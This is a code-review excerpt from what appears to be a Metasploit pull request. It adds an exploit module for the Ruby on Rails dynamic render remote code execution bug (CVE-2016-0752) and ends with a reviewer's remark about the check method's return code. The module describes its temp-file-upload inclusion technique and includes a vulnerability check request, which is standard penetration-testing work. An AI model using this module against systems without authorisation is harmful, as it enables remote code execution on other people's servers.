modules/exploits/multi/http/rails_dynamic_render_code_exec.rb

```diff
@@ -0,0 +1,246 @@
+      'Name'           => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote code execution vulnerability in the explicit render
+        method when leveraging user parameters.
+        This module has been tested across multiple versions of Ruby on Rails.
+        The technique used by this module requires the specified
+        endpoint to be using dynamic render paths, such as the following example:
+
+        def show
+          render params[:id]
+        end
+
+        Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
+        can literally be any endpoint. This module doesnt use the log inclusion method of
+        exploitation due to it not being universal enough. Instead, a new code injection
+        technique was found and used whereby an attacker can upload temporary image files
+        against any POST endpoint and use them for the inclusion attack. Finally, you only
+        get one shot at this if you are testing with the builtin rails server, use caution.
+      },
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>',      # necromanced old bug & discovered new vector rce vector
+          'John Poulin (forced-request)'               # original render bug finder
+        ],
+      'References'  =>
+        [
+          [ 'CVE', '2016-0752'],
+          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'],        # rails patch
+          [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'],  # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
+          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'],                     # John's original exploit
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'    => ['linux', 'bsd'],
+      'Arch'        => ARCH_X86,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Privileged'     => false,
+      'Targets'     =>
+        [
+          [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ]                                                   # Other versions are also affected
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Oct 16 2016'))
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
+        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
+      ], self.class)
+  end
+
+  def check
+
+    # this is the check for the dev environment
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2f"),
+      'method'    =>  'GET',
+    }, 60)
+
+    # if the page controller is dynamically rendering, its probably vuln
+    if res and res.body =~ /render params/
+      return Exploit::CheckCode::Vulnerable
```

Comment:
Based on your comment, I'd argue this should be `Exploit::CheckCode::Detected` or `Exploit::CheckCode::Appears` based on [this page](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method)